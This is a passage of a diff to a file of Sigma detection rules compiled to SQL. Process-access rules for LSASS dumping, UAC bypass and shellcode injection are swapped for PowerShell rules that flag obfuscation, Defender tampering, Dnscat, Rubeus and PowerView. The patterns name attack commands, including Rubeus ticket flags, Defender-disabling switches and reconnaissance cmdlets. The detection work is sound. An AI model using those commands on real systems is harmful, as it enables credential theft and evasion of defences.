"posh_ps_invoke_obfuscation_stdin.yml" }, { - "title": "UAC Bypass Using WOW64 Logger DLL Hijack", - "id": "4f6c43e2-f989-4ea5-bcd8-843b49a0317c", - "status": "test", - "description": "Detects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)", - "author": "Christian Burkard (Nextron Systems)", + "title": "Invoke-Obfuscation VAR+ Launcher - PowerShell", + "id": "0adfbc14-0ed1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND SourceImage LIKE '%:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' AND GrantedAccess = '0x1fffff' AND CallTrace LIKE 'UNKNOWN(0000000000000000)|UNKNOWN(0000000000000000)|%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r)(?:\\s|)\"set\\s[a-zA-Z]{3,6}.*(?:\\{\\d\\}){1,}\\\\\"\\s+?-f(?:.*\\)){1,}.*\"')" ], - "filename": "proc_access_win_uac_bypass_wow64_logger.yml" + "filename": "posh_ps_invoke_obfuscation_var.yml" }, { - "title": "Potential Shellcode Injection", - "id": "250ae82f-736e-4844-a68b-0b5e8cc887da", + "title": "Disable Powershell Command History", + "id": "602f5669-6927-4688-84db-0d4b7afb2150", "status": "experimental", - "description": "Detects potential shellcode injection used by tools such as Metasploit's migrate and Empire's psinject", - "author": "Bhabesh Raj", + "description": "Detects scripts or commands that disabled the Powershell command history by removing psreadline module", + "author": "Ali Alwashali", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1055" + "attack.t1070.003" ], "falsepositives": [ - "Unknown" + "Legitimate script that disables the command history" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (GrantedAccess IN ('0x147a', '0x1f3fff') AND CallTrace LIKE '%UNKNOWN%' ESCAPE '\\') AND NOT (((SourceImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\%' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\%' ESCAPE '\\') AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Dell\\\\UpdateService\\\\ServiceShell.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\Explorer.EXE' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR ((SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\PerfWatson2.exe' ESCAPE '\\') AND (TargetImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\2022\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR TargetImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\2019\\\\Community\\\\Common7\\\\IDE\\\\devenv.exe' ESCAPE '\\') AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll%' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Program Files\\\\Dell\\\\DellDataVault\\\\DDVDataCollector.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\Wbem\\\\Wmiprvse.exe' ESCAPE '\\' AND TargetImage LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND CallTrace LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll%' ESCAPE '\\' AND CallTrace LIKE '%\\\\System.ni.dll+%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Remove-Module%' ESCAPE '\\' AND ScriptBlockText LIKE '%psreadline%' ESCAPE '\\')" ], - "filename": "proc_access_win_shellcode_inject_msf_empire.yml" + "filename": "posh_ps_disable_psreadline_command_history.yml" }, { - "title": "CMSTP Execution Process Access", - "id": "3b4b232a-af90-427c-a22f-30b0c0837b95", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell", + "id": "73e67340-0d25-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1218.003", + "attack.t1027", "attack.execution", - "attack.t1559.001", - "attack.g0069", - "attack.g0080", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%cmlua.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" ], - "filename": "proc_access_win_cmstp_execution_by_access.yml" + "filename": "posh_ps_invoke_obfuscation_clip.yml" }, { - "title": "Credential Dumping Tools Accessing LSASS Memory", - "id": "32d0d3e2-e58d-4d41-926b-18b520b2b32d", - "status": "experimental", - "description": "Detects processes requesting access to LSASS memory via suspicious access masks. This is typical for credentials dumping tools", - "author": "Florian Roth, Roberto Rodriguez, Dimitrios Slamaris, Mark Russinovich, Thomas Patzke, Teymur Kheirkhabarov, Sherif Eldeeb, James Dickenson, Aleksey Potapov, oscd.community", + "title": "Create Volume Shadow Copy with Powershell", + "id": "afd12fed-b0ec-45c9-a13d-aa86625dac81", + "status": "test", + "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", + "author": "frack113", "tags": [ "attack.credential_access", - "attack.t1003.001", - "attack.s0002", - "car.2019-04-004" + "attack.t1003.003" ], "falsepositives": [ - "Likely" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '0x40%' ESCAPE '\\' OR GrantedAccess LIKE '0x100000%' ESCAPE '\\' OR GrantedAccess LIKE '0x1410%' ESCAPE '\\' OR GrantedAccess LIKE '0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '0x143a%' ESCAPE '\\' OR GrantedAccess LIKE '0x1418%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f0fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f1fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f2fff%' ESCAPE '\\' OR GrantedAccess LIKE '0x1f3fff%' ESCAPE '\\')) AND NOT (((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\taskmgr.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\perfmon.exe' ESCAPE '\\')) OR ((SourceImage LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\%' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe%' ESCAPE '\\') AND SourceImage LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND CallTrace LIKE '%|C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Definition Updates\\\\{%' ESCAPE '\\' AND CallTrace LIKE '%}\\\\mpengine.dll+%' ESCAPE '\\' AND GrantedAccess = '0x1418') OR ((CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\mprtp.dll%' ESCAPE '\\' OR CallTrace LIKE '%|c:\\\\program files\\\\windows defender\\\\MpClient.dll%' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\GamingServices.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x410')) OR ((SourceImage LIKE '%\\\\PROCEXP64.EXE' ESCAPE '\\' OR SourceImage LIKE '%\\\\PROCEXP.EXE' ESCAPE '\\' OR SourceImage LIKE '%C:\\\\WINDOWS\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\MBAMInstallerService.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x40')) OR ((SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\wbem\\\\wmiprvse.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND GrantedAccess IN ('0x1410', '0x410', '0x1f1fff', '0x1f3fff')) OR ((SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\wininit.exe' ESCAPE '\\' OR SourceImage LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\') AND GrantedAccess = '0x1000000') OR (SourceImage LIKE 'C:\\\\ProgramData\\\\VMware\\\\VMware Tools\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\vmtoolsd.exe' ESCAPE '\\') OR (SourceImage LIKE 'C:\\\\WINDOWS\\\\system32\\\\svchost.exe' ESCAPE '\\' AND GrantedAccess IN ('0x100000', '0x1410')) OR ((SourceImage LIKE '%\\\\thor.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\thor64.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\aurora-agent-64.exe' ESCAPE '\\') AND GrantedAccess IN ('0x40', '0x1010')) OR (SourceImage LIKE '%\\\\explorer.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\Windows\\\\system32\\\\MRT.exe' ESCAPE '\\' AND GrantedAccess IN ('0x1410', '0x1418')) OR (GrantedAccess = '0x40' AND (SourceImage LIKE '%\\\\handle.exe' ESCAPE '\\' OR SourceImage LIKE '%\\\\handle64.exe' ESCAPE '\\')) OR (SourceImage LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\Installer\\\\setup.exe' ESCAPE '\\') OR (SourceImage LIKE '%\\\\AppData\\\\Local\\\\WebEx\\\\WebexHost.exe' ESCAPE '\\' AND GrantedAccess = '0x401') OR (SourceImage LIKE 'C:\\\\PROGRAMDATA\\\\MALWAREBYTES\\\\MBAMSERVICE\\\\ctlrupdate\\\\mbupdatr.exe' ESCAPE '\\' AND GrantedAccess = '0x1410') OR ((SourceImage LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR SourceImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\') AND SourceImage LIKE '%.tmp\\\\DropboxUpdate.exe' ESCAPE '\\' AND GrantedAccess IN ('0x410', '0x1410')) OR (SourceImage LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' AND SourceImage LIKE '%\\\\MSBuild\\\\Current\\\\Bin\\\\MSBuild.exe' ESCAPE '\\' AND GrantedAccess = '0x1F3FFF') OR (SourceImage LIKE '%\\\\SteamLibrary\\\\steamapps\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" ], - "filename": "proc_access_win_cred_dump_lsass_access.yml" + "filename": "posh_ps_create_volume_shadow_copy.yml" }, { - "title": "CobaltStrike BOF Injection Pattern", - "id": "09706624-b7f6-455d-9d02-adee024cee1d", - "status": "test", - "description": "Detects a typical pattern of a CobaltStrike BOF which inject into other processes", - "author": "Christian Burkard (Nextron Systems)", + "title": "Tamper Windows Defender - ScriptBlockLogging", + "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", + "status": "experimental", + "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", + "author": "frack113, elhoim, Tim Shelton (fps, alias support)", "tags": [ - "attack.execution", - "attack.t1106", "attack.defense_evasion", "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace REGEXP '^C:\\\\Windows\\\\SYSTEM32\\\\ntdll\\.dll\\+[a-z0-9]{4,6}\\|C:\\\\Windows\\\\System32\\\\KERNELBASE\\.dll\\+[a-z0-9]{4,6}\\|UNKNOWN\\([A-Z0-9]{16}\\)$' AND GrantedAccess IN ('0x1028', '0x1fffff'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" ], - "filename": "proc_access_win_cobaltstrike_bof_injection_pattern.yml" + "filename": "posh_ps_tamper_defender.yml" }, { - "title": "LSASS Memory Dump", - "id": "5ef9853e-4d0e-4a70-846f-a9ca37d876da", - "status": "experimental", - "description": "Detects process LSASS memory dump using Mimikatz, NanoDump, Invoke-Mimikatz, Procdump or Taskmgr based on the CallTrace pointing to ntdll.dll, dbghelp.dll or dbgcore.dll for win10, server2016 and up.", - "author": "Samir Bousseaden, Michael Haag", - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0002" + "title": "Dnscat Execution", + "id": "a6d67db4-6220-436d-8afc-f3842fe05d43", + "status": "test", + "description": "Dnscat exfiltration tool execution", + "author": "Daniil Yugoslavskiy, oscd.community", + "tags": [ + "attack.exfiltration", + "attack.t1048", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "False positives are present when looking for 0x1410. Exclusions may be required." + "Legitimate usage of PowerShell Dnscat2 — DNS Exfiltration tool (unlikely)" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND (GrantedAccess LIKE '%0x1038%' ESCAPE '\\' OR GrantedAccess LIKE '%0x1438%' ESCAPE '\\' OR GrantedAccess LIKE '%0x143a%' ESCAPE '\\') AND (CallTrace LIKE '%dbghelp.dll%' ESCAPE '\\' OR CallTrace LIKE '%dbgcore.dll%' ESCAPE '\\' OR CallTrace LIKE '%ntdll.dll%' ESCAPE '\\')) AND NOT ((CallTrace LIKE '%|C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND CallTrace LIKE '%\\\\thor\\\\thor64.exe+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND GrantedAccess = '0x103800') OR (SourceImage LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Dnscat2%' ESCAPE '\\')" ], - "filename": "proc_access_win_lsass_memdump.yml" + "filename": "posh_ps_dnscat_execution.yml" }, { - "title": "Load Undocumented Autoelevated COM Interface", - "id": "fb3722e4-1a06-46b6-b772-253e2e7db933", - "status": "test", - "description": "COM interface (EditionUpgradeManager) that is not used by standard executables.", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - Rubeus Execution - ScriptBlock", + "id": "3245cd30-e015-40ff-a31d-5cadd5f377ec", + "status": "experimental", + "description": "Detects the execution of the hacktool Rubeus using specific command line flags", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.credential_access", + "attack.t1003", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CallTrace LIKE '%editionupgrademanagerobj.dll%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%asreproast %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /service:krbtgt %' ESCAPE '\\' OR ScriptBlockText LIKE '%dump /luid:0x%' ESCAPE '\\' OR ScriptBlockText LIKE '%kerberoast %' ESCAPE '\\' OR ScriptBlockText LIKE '%createnetonly /program:%' ESCAPE '\\' OR ScriptBlockText LIKE '%ptt /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%/impersonateuser:%' ESCAPE '\\' OR ScriptBlockText LIKE '%renew /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%asktgt /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%harvest /interval:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /user:%' ESCAPE '\\' OR ScriptBlockText LIKE '%s4u /ticket:%' ESCAPE '\\' OR ScriptBlockText LIKE '%hash /password:%' ESCAPE '\\' OR ScriptBlockText LIKE '%golden /aes256:%' ESCAPE '\\' OR ScriptBlockText LIKE '%silver /user:%' ESCAPE '\\'))" ], - "filename": "proc_access_win_load_undocumented_autoelevated_com_interface.yml" + "filename": "posh_ps_hktl_rubeus.yml" }, { - "title": "HandleKatz Duplicating LSASS Handle", - "id": "b1bd3a59-c1fd-4860-9f40-4dd161a7d1f5", - "status": "experimental", - "description": "Detects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles", - "author": "Bhabesh Raj (rule), @thefLinkk", + "title": "Malicious PowerView PowerShell Commandlets", + "id": "dcd74b95-3f36-4ed9-9598-0490951643aa", + "status": "test", + "description": "Detects Commandlet names from PowerView of PowerSploit exploitation framework.", + "author": "Bhabesh Raj", "tags": [ "attack.execution", - "attack.t1106", - "attack.defense_evasion", - "attack.t1003.001" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Should not be any as administrators do not use this tool" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '10' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetImage LIKE '%\\\\lsass.exe' ESCAPE '\\' AND GrantedAccess = '0x1440' AND CallTrace LIKE 'C:\\\\Windows\\\\System32\\\\ntdll.dll+%' ESCAPE '\\' AND CallTrace LIKE '%|UNKNOWN(%' ESCAPE '\\' AND CallTrace LIKE '%)' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-ADName%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertFrom-UACValue%' ESCAPE '\\' OR ScriptBlockText LIKE '%Convert-NameToSid%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-SID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-PowerViewCSV%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainLocalGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainObjectPropertyOutlier%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-DomainUserLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ForeignUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOComputerAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-InterestingFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-LocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-ManagedSecurityGroups%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-CachedRDPConnection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DFSshare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainController%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDFSShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSRecord%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainDNSZone%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainGroupMember%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainManagedSecurityGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObject%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainPolicy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSID%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSPNTicket%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-DomainUserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Forest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IPAddress%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LastLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LoggedOnLocal%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetComputer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetDomain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetFileServer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetForest%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGPO%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLocalGroup%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetLoggedon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetOU%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetRDPSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSession%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetShare%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSite%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetSubnet%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-NetUser%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ObjectAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PathAcl%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Proxy%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegistryMountedDrive%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegLoggedOn%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteName%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UserEvent%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-WMIReg%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CheckLocalAdminAccess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EnumerateLocalAdmin%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EventHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FileFinder%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-MapDomainTrust%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ProcessHunter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RevertToSelf%' ESCAPE '\\' OR 